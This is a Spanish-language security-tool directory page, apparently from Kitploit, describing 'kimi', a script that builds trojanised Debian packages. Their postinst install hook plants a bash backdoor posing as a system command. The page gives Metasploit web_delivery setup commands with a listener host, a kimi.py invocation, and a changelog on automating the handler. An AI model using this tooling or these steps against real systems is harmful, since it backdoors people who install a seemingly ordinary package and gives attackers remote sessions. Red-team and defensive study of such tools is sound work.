Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
kimi — Script para generar paquetes debian maliciosos (troyanos debain). | Kitploit
Herramientas/GitHubGitHub/chaitanyaharitash/kimi
Frameworks de ExploitsGeneración de PayloadsPost-ExplotaciónAnálisis de MalwarePruebas de PenetraciónComando y ControlRed TeamingDesarrollo de Payloads
GitHubchaitanyaharitash/kimi

kimi

Script para generar paquetes debian maliciosos (troyanos debain).

Ver Repositorio
12354hace 7 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

kimi - Generador de paquetes Debian maliciosos

Script para generar paquetes debian maliciosos (troyanos debain).

Acerca de & Puntos positivos & Uso & Probado en :::

root@kitploit:~
Kimi es un nombre inspirado en "Kimimaro", uno de mis personajes favoritos del anime llamado "Naruto".

Kimi es un script que genera un paquete debian malicioso para metasploit
que consiste en un archivo bash. El archivo bash se despliega en el directorio "/usr/local/bin/".

La puerta trasera se ejecuta justo cuando la víctima intenta instalar el paquete deb debido al archivo postinst

El archivo bash se inyecta y también actúa como algún comando del sistema que, cuando es ejecutado por la víctima, 
y el atacante obtiene una sesión.

Puntos positivos :
-- Totalmente independiente. Significa que el usuario no necesita instalar ningún creador de paquetes debian
-- Puede integrarse fácilmente con cualquier generador de payload debido a los argumentos (simple :P lo sé) 

Kimi básicamente depende del módulo web_delivery y todo está automatizado. 
todo lo que el atacante necesita es realizar las siguientes configuraciones :

Configuración de Web_Delivery en msf :

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set srvhost 192.168.0.102
srvhost => 192.168.0.102
msf exploit(web_delivery) > set uripath /SecPatch
uripath => /SecPatch
msf exploit(web_delivery) > set Lhost 192.168.0.102
Lhost => 192.168.0.102
msf exploit(web_delivery) > show options
msf exploit(web_delivery) > exploit

Generando payload malicioso :

dreamer@mindless ~/Desktop/projects/kimi $ sudo python kimi.py -n nano -l 127.0.0.1 -V 1.0 -a i386

NOTA :: Este proyecto fue creado para ser integrado con Venom Shellcode Generator 1.0.13.
También se puede usar de forma independiente, todo lo que el usuario necesita es cambiar uripath en las variables de msf
-------------------------------------------------------------------------------------

Probado en :
            Linux Mint 17.2 Cinnamon (Ubuntu 14.04) 
            ParrotOS (Debian Jessie)
            Kali Rolling 2.0

Actualizaciones :::

root@kitploit:~
[Feb-22-2017]
-- Se añadió función de creación de archivo "postinst" para automatizar la ejecución del archivo malicioso incrustado
-- Se añadió función de generación de archivo RC para automatizar completamente con la apertura del handler, lo que significa que no es necesario 
    configurar el handler manualmente
-- Se corrigieron algunos errores comunes [agradecimientos especiales a r00t 3xp10it :)]

[Oct-12-2017]
-- Se añadió argumento de línea de comandos (-a/--arch) para seleccionar arquitectura (i386/amd64)

[April-24-2019] - Versión de prueba.
-- Ahora se puede configurar URI y LPORT personalizados
-- El payload de Python se ha actualizado según Python 2/3 y también la última versión de Metasploit 5.
-- Todo el código se reimplementó aunque todavía soporta Python 2.7

Capturas de pantalla :::

Main Banner Kimi In Action

Miscelánea :::

root@kitploit:~
   Blog Post     : http://hackinguyz.blogspot.in/2017/03/kimi-malicious-debian-package-creator.html
   YouTube Video : https://youtu.be/Dsn6BRHy9_w
   Muestra de VirusTotal (Porque vi un uso desagradable de este script en la naturaleza): 7d91abb413c8cd3274f348ff12f244b9a503abfe018f138d34bbe2deab04472f

Agradecimientos a :::

Suspicious Shell Activity [Red Team]

¿Dudas? ¿Insultos?

Twitter : @bofheaded

Descargar herramienta